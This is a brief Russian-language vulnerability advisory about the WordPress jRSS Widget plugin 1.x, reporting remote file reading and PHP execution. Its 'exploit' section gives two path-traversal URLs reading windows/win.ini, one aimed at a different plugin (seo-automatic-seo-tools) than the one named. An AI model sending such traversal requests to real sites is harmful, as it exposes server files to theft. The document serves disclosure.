• Партнер

  • Программа: WordPress jRSS Widget Plugin 1.x

    Уязвимость позволяет удаленному пользователю выполнить произвольный PHP
    сценарий на целевой системе. Удаленный пользователь может получить содержимое
    произвольных файлов на целевой системе.

    Эксплоит:

    http://localhost/wordpress/wp-content/plugins/jrss-widget/proxy.php?url=../../../../../../../../windows/win.ini

    http://localhost/wordpress/wp-content/plugins/seo-automatic-seo-tools/feedcommander/get_download.php?file=../../../../../../../../windows/win.ini

    Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии